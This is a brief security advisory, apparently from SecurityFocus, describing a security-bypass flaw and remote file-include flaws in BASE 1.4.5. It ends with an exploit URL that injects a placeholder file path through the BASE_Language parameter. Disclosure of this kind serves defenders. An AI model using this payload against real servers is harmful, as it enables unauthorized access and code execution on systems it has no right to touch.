source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/setup/base_conf_contents.php?BASE_Language=[EV!L]